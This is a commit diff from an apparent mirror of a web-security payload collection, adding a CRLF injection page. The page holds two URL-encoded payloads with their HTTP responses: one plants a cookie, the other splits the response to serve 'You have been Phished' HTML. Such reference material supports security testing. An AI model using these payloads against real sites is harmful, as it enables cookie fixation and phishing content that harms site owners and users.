mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
CRLF Payload
This commit is contained in:
parent
dee7a0d034
commit
758f643d56
2 changed files with 41 additions and 6 deletions
|
@ -1,12 +1,45 @@
|
|||
# Title
|
||||
Lorem
|
||||
# CRLF
|
||||
The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
|
||||
|
||||
## Vuln
|
||||
A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
|
||||
|
||||
## CRLF - Add a cookie
|
||||
Requested page
|
||||
```
|
||||
Code
|
||||
http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue
|
||||
```
|
||||
|
||||
HTTP Response
|
||||
```
|
||||
Connection: keep-alive
|
||||
Content-Length: 178
|
||||
Content-Type: text/html
|
||||
Date: Mon, 09 May 2016 14:47:29 GMT
|
||||
Location: https://www.example.net/
|
||||
Set-Cookie: mycookie=myvalue
|
||||
X-Frame-Options: SAMEORIGIN
|
||||
X-Sucuri-ID: 15016
|
||||
x-content-type-options: nosniff
|
||||
x-xss-protection: 1; mode=block
|
||||
```
|
||||
|
||||
## CRLF - Write HTML
|
||||
Requested page
|
||||
```
|
||||
http://www.example.net/index.php?lang=en%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
|
||||
```
|
||||
|
||||
HTTP response
|
||||
```
|
||||
Set-Cookie:en
|
||||
Content-Length: 0
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Content-Type: text/html
|
||||
Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT
|
||||
Content-Length: 34
|
||||
|
||||
<html>You have been Phished</html>```
|
||||
|
||||
## Thanks to
|
||||
* Lorem
|
||||
* Ipsum
|
||||
* https://www.owasp.org/index.php/CRLF_Injection
|
|
@ -1,2 +1,4 @@
|
|||
/!\ Work in Progress : 1%
|
||||
|
||||
# PayloadsAllTheThings
|
||||
A list of every usefull payloads and bypass for Web Application Security
|
||||
|
|
Loading…
Reference in a new issue